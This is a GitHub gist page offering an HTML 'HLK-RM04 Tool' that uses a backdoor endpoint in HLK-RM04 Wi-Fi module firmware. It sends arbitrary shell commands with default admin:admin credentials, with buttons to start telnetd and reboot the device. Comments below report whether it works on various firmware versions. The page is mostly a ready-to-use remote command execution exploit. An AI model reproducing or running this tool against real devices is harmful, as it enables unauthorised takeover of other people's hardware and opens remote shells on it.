Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
Another backdoor for the rm04, need I say any more?
<html>
<head>
<title>HLK-RM04 Tool</title>
<style>
form {
display: inline;
}
</style>
</head>
<body>
<h1>HLK-RM04 Tool</h1>
<b>Shell command:</b><br />
<form action="http://admin:admin@192.168.16.254/goform/hlk34fge3360llf94wwq24" method="POST" target="frame">
<input type="text" name="command" size=40 /><input type="submit" value="Run" />
</form>
<hr />
<b>Quick actions:</b><br />
<form action="http://admin:admin@192.168.16.254/goform/hlk34fge3360llf94wwq24" method="POST" target="frame">
<input type="hidden" name="command" value="telnetd" /><input type="submit" value="Start telnetd" />
</form>
<form action="http://admin:admin@192.168.16.254/goform/hlk34fge3360llf94wwq24" method="POST" target="frame">
<input type="hidden" name="command" value="reboot" /><input type="submit" value="Reboot" />
</form>
<iframe src="about:blank" name="frame" width="0" height="0" frameborder="0"></iframe>
</body>
</html>

Hi!

Not works for me. Firmware V1.78(Jul 23 2013)

Do you remember how to find action url in device's filesystem?

I have the same version and it works perfect. I jusst changed the three IP addresses in the file to the one of my module.

beikeland commented Dec 17, 2017

Seems this has changed over the years.

<html><head></head><body>
                This document has moved to a new <a href="http://192.168.0.1/adm/system_command.asp">location</a>.
                Please update your documents to reflect the new location.
                </body></html>

http://192.168.0.1/adm/system_command.asp results in a 404 page with both get and post requests.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment